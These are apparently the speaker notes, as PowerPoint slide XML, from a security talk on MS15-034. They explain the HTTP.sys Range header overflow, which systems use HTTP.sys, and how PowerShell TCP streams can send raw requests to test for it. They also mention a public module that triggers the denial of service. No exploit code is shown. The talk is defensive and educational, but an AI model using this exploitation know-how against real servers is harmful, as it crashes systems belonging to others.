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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="264" r:id="rId3"/>
    <p:sldId id="270" r:id="rId4"/>
    <p:sldId id="268" r:id="rId5"/>
    <p:sldId id="275" r:id="rId6"/>
    <p:sldId id="276" r:id="rId7"/>
    <p:sldId id="278" r:id="rId8"/>
    <p:sldId id="274" r:id="rId9"/>
    <p:sldId id="277" r:id="rId10"/>
    <p:sldId id="283" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="284" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="25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48473" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="63" d="100"/>
          <a:sy n="63" d="100"/>
        </p:scale>
        <p:origin x="2256"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AD91D5-CE34-4FA5-A397-AC281CF1156D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2547646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Hi everyone,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> my name is Kieran Jacobsen, I am a Technical Lead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" smtClean="0"/>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" smtClean="0"/>
              <a:t>Readify. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Tonight I am hear to talk about working with TCP connections and how we can use this to exploit the vulnerability described in MS15034.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253544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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> just to highlight, if we specify those carriage returns and new lines, we get something like this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>I just wanted to point out that the escape character for PowerShell is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>backtick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, and not the forward slash. If you are working of example online, maybe those written in c#, they will probably use forward slash r forward slash n, if you don’t change this when moving to PowerShell, you might end up sending a garbage request to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Also note that there is an empty or blank line at the end. This is to indicate to the server that our request is complete.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2022598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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> next thing we need to understand is how to send and receive information over our TCP connection. When we connect using the TCP client, it provides us with something called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>TCPStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. We send our requests, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>recieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the responses over this stream.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We can either write and read directly to the stream, however we will need to encode our strings to either ASCII or UTF byte arrays; or we could use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>StreamWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>StreamReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> objects from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. The choice is yours with this one, I have used both methods and they are equally reliable. Today I will show you the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>StreamWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>StreamReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, overall I found these to be a bit easier and the code produced seems to be easier to understand.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>There is one other stream that can be used, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SSLStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SSLStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> makes the process of connecting to SSL services much, much easier. Implementing SSL requires a change to one line of code, and an additional line to verify the server’s certificates. Piece of cake! I really did expect this to be much harder, and was utterly astounded at how easy Microsoft has made it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="460764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 lets take a look</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>&lt;code demos&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2597891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as part of my work on the MS15034, I developed a PowerShell module that allows us to firstly test if a server is vulnerable, and secondly invoke the denial of service. I have made this code publicly available, and have been surprised at its popularity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Let’s take a look at the module in action.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="940217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is all for me tonight, if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> you want more information, my website is PoshSecurity.com. I write mostly about security, PowerShell and automation. I will put up the slides and demos from tonight’s presentation on there in the coming days. You can contact me on my site, or I can be found via Twitter, @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>kjacobsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The module I developed for MS15-034 can be found on GitHub, and I have also put up a link to the original Microsoft KB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Thank you all for listening to me tonight. Does anyone have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>any questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3854473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 who here knows about MS15034, can I just see some hands?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So the bulletin has this for its brief description:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who successfully exploited this vulnerability could execute arbitrary code in the context of the System account.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wow, that doesn’t sound too good. Remote code executing as the system account, that doesn’t sound good, or is it?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1288848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A remote code execution vulnerability, or RCE, allows a successful attacker to execute the code of their choosing on your system. Now as the old security adage says, if the bad guy can execute code on your box, it isn’t your box anymore.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Now when we discuss RCEs, there is one important factor that we should consider. Authentication. 15034 is an unauthenticated RCE, and this means that an attacker does not require any previous valid credentials to be able to perform a successful attack. These sorts of vulnerabilities are quite prevalent, and are always a serious risk to our systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1231878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One</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> thing that came out about this vulnerability, is that a significant portion of the community, both infrastructure and security community, don’t quite understand what HTTP.SYS is, and what it does. HTTP.SYS is a server protocol stack, and was first introduced by Microsoft back in Windows Server 2003. It was Microsoft’s response to the scrutiny that had occurred over its security practices in light of events like the Code Red worm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>It was also Microsoft’s aim for this protocol stack to allow for faster, lightweight and more securely deployed web server environments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The first place HTTP.SYS appeared was obviously, IIS, however it can now be found in a wide range of places. Direct Access, the SSTP VPN, the Web Application proxy and later versions of ADFS and SSRS. Mostly importantly however, Windows Remoting is based upon HTTP.SYS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>At this point, you should be getting just a little bit worried. I am describing an unauthenticated remote code execution vulnerability across a wide range of systems deployed in your environment, some of which are public facing. Also, consider how many systems have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> publicly exposed, and you wouldn’t be blamed for thinking the whole situation is just a little bit terrifying.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1094094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Thankfully, this vulnerability isn’t quite a simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> as it first looks. This vulnerability requires the presence of the IIS Kernel Caching module and that is typically only found in IIS installations. Most importantly, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> doesn’t use this module.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>At this moment, you can start to relax a little.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Now the security community has always be quick to reverse engineer patches like this, and in this case, they were exceptionally fast. It was quickly discovered that the issue was in the way HTTP.SYS parses the RANGE HTTP header in a HTTP request. If the range specified was suitably large, this could result in a buffer overflow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Just as a matter of knowledge, the range header allows a client to request only part of a file or entity. Say we just wanted the first 100 bytes of that jpg image, well, we could use the range header to specify that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Now it turns out, RCE from just this header alone, isn’t easy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3901974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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> thankfully is the worst thing that an attacker can do to a vulnerable system.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Whilst there was some claims that there were ways of using this vulnerability to actually execute code, most of the time, the result is an instant bluescreen of death like this one. A denial of service vulnerability like this one is definitely nowhere near as bad as remote code execution, but no matter what, if someone is doing this to your servers, you are going to have a bad day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Any attack, which can be performed easily, anonymously and requires little to no technical knowledge or ability that results in a denial of service, is pretty serious.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1639309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 whenever you read about a vulnerability, or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> your CISO, CIO or CTO read about one, the first thing you will be asked, or want to know, is are we vulnerable?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Now there were websites that you could use to check if a server was vulnerable, but that isn’t something we would all be comfortable with. There were </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and python scripts as well, and for those who know </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, there was a module for that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>But I wanted to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Let’s take a quick look at using PowerShell to test for the vulnerability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151825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There</a:t>
            </a:r>
            <a:r>
